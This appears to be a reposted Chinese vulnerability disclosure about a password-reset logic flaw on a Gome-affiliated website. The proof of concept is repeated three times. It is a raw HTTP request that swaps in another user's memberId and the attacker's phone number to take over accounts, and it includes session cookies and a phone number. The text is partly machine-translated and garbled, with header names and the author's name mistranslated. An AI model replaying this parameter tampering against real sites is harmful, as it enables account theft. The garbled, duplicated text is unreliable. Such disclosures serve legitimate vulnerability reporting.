国美在线旗下某站点逻辑设计缺陷导致任意用户密码重置
漏洞标题 国美在线旗下某站点逻辑设计缺陷导致任意用户密码重置 相关厂商 国美控股集团 漏洞作者 奶嘴 提交时间 2016-05-05 19:54 公开时间 2016-06-20 09:50 漏洞类型 …
漏洞标题
Gome Online网站的逻辑设计缺陷导致任何用户密码重置
相关制造商
国美控股集团
漏洞作者
乳头
提交时间
2016-05-05 19: 54
公共时间
2016-06-20 09: 50
漏洞类型
设计缺陷/逻辑错误
危险等级
高
自我评估等级
15
漏洞状态
制造商已确认
标签标签
设计错误,设计缺陷/边界旁路,设计缺陷,逻辑错误
漏洞详细信息
打开http://www.multigold.com.cn/forgetPassword.html
抓包
POST /myec/member_sendMobileCode.html HTTP/1.1
主机: www.multigold.com.cn
内容长度: 34
接受: */*
来源:http://www.multigold.com.cn
X-Requested-With: XMLHttpRequest
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/48.0.2564.116 Safari/537.36
内容类型: application/x-www-form-urlencoded
Referer:http://www.multigold.com.cn/forgetPassword.html
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh; q=0.8
Cookie:是M=y; JSESSIONID=2C26CBCF9A46278CAA538326D8 * 87A8; BIGipServerNginx_pool=16879882.20480.0000; QIAO_CK_5046321_R=; baidu_qiao_v3_count_5046321=1; isM=y; 53kf_70771113_keyword=http://www.multigold.com.cn/show-forgetPassword.html; _gsref_1927850995=http://www .multigold.com.cn/show-forgetPassword.html; _gscu_1927850995=62448307gbzopb26; _gscs_1927850995=62448307yr2n8r26 | pv: 2; _gscbrs_1927850995=1; Hm_lvt_c06c14f2ede01409c9caa02fd63369e9=1462448308; Hm_lpvt_c06c14f2ede01409c9caa02fd63369e9=1462448699; CNZZDATA1000338348=223599442-1462448309-%7C1462448309
连接:关闭
memberId=118953& mobile=13730766696
电话号码而不是自己的号码
短信收到OK
密码是
123456
漏洞证明:
打开http://www.multigold.com.cn/forgetPassword.html
抓包
POST /myec/member_sendMobileCode.html HTTP/1.1
主机: www.multigold.com.cn
内容长度: 34
接受: */*
来源:http://www.multigold.com.cn
X-Requested-With: XMLHttpRequest
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/48.0.2564.116 Safari/537.36
内容类型: application/x-www-form-urlencoded
Referer:http://www.multigold.com.cn/forgetPassword.html
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh; q=0.8
Cookie:是M=y; JSESSIONID=2C26CBCF9A46278CAA538326D8 * 87A8; BIGipServerNginx_pool=16879882.20480.0000; QIAO_CK_5046321_R=; baidu_qiao_v3_count_5046321=1; isM=y; 53kf_70771113_keyword=http://www.multigold.com.cn/show-forgetPassword.html; _gsref_1927850995=http://www .multigold.com.cn/show-forgetPassword.html; _gscu_1927850995=62448307gbzopb26; _gscs_1927850995=62448307yr2n8r26 | pv: 2; _gscbrs_1927850995=1; Hm_lvt_c06c14f2ede01409c9caa02fd63369e9=1462448308; Hm_lpvt_c06c14f2ede01409c9caa02fd63369e9=1462448699; CNZZDATA1000338348=223599442-1462448309-%7C1462448309
连接:关闭
memberId=118953& mobile=13730766696
电话号码而不是自己的号码
短信收到OK
密码是
123456
修理计划:
没有
版权声明:请注明出处。奶嘴@乌云
漏洞证明:
打开http://www.multigold.com.cn/forgetPassword.html
抓包
POST /myec/member_sendMobileCode.html HTTP/1.1
主机: www.multigold.com.cn
内容长度: 34
接受: */*
来源:http://www.multigold.com.cn
X-Requested-With: XMLHttpRequest
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/48.0.2564.116 Safari/537.36
内容类型: application/x-www-form-urlencoded
Referer:http://www.multigold.com.cn/forgetPassword.html
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh; q=0.8
Cookie:是M=y; JSESSIONID=2C26CBCF9A46278CAA538326D8 * 87A8; BIGipServerNginx_pool=16879882.20480.0000; QIAO_CK_5046321_R=; baidu_qiao_v3_count_5046321=1; isM=y; 53kf_70771113_keyword=http://www.multigold.com.cn/show-forgetPassword.html; _gsref_1927850995=http://www .multigold.com.cn/show-forgetPassword.html; _gscu_1927850995=62448307gbzopb26; _gscs_1927850995=62448307yr2n8r26 | pv: 2; _gscbrs_1927850995=1; Hm_lvt_c06c14f2ede01409c9caa02fd63369e9=1462448308; Hm_lpvt_c06c14f2ede01409c9caa02fd63369e9=1462448699; CNZZDATA1000338348=223599442-1462448309-%7C1462448309
连接:关闭
memberId=118953& mobile=13730766696
电话号码而不是自己的号码
短信收到OK
密码是
123456
修理计划:
没有
版权声明:请注明出处。奶嘴@乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 511 )
- 分类:黑客技术
